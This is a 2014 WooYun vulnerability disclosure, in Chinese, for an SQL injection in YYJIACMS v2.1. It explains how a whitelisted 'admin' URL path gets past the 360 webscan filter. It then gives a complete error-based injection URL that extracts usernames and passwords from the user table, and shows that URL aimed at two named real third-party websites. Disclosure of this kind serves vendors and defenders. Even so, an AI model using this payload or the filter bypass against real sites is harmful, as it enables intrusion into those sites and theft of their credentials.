当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-072756

漏洞标题:YYJIACMS v2.1最新版 sql注射 (绕过360直接出数据)

相关厂商:yyjia.com

漏洞作者: roker

提交时间:2014-08-17 14:07

修复时间:2014-11-12 14:08

公开时间:2014-11-12 14:08

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-08-17: 细节已通知厂商并且等待厂商处理中
2014-08-22: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2014-10-16: 细节向核心白帽子及相关领域专家公开
2014-10-26: 细节向普通白帽子公开
2014-11-05: 细节向实习白帽子公开
2014-11-12: 细节向公众公开

简要描述:

rt

详细说明:

get_comment,get_appinfo这些函数对进入的数据都没用进行过滤
/source/cp_android_detail.php

$commentlists=get_comment($_GET['id'],0,$start,$perpage,1);


直接get带入的查询,由于源码zend加密了 ,就不多做分析了
这个问题看以前有人提到过
WooYun: yyjiacms (应用+ CMS) SQL注射(官网演示)
程序员的做法是加了个360脚本防护,然而这是可以绕过的
参见 http://www.leavesongs.com/PENETRATION/360webscan-bypass.html
yyjiacms的白名单为

$webscan_white_directory='admin|\/dede\/';
//url白名单,可以自定义添加url白名单,默认是对phpcms的后台url放行


我们访问

/android.php/admin?ac=detail&cname=juesebanyan&id=1%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(username,0x5c,password)%20from%20user),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23


直接报出了数据

1.jpg


百度随意两个例子
http://wtshu.net/android.php/admin?ac=detail&cname=juesebanyan&id=1%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(username,0x5c,password)%20from%20user),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
http://mm.wufafa.com/android.php/admin?ac=detail&cname=juesebanyan&id=1%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(username,0x5c,password)%20from%20user),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23

漏洞证明:

1.jpg

修复方案:

intval

版权声明:转载请注明来源 roker@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-11-12 14:08

厂商回复:

最新状态:

2015-05-08:已经修复


漏洞评价:

评论

  1. 2014-08-17 15:28 | 李白 ( 普通白帽子 | Rank:142 漏洞数:29 )

    洞主大哥哥好厉害的!

  2. 2014-08-17 15:48 | roker ( 普通白帽子 | Rank:357 漏洞数:108 )

    楼上萌萌哒好棒棒的!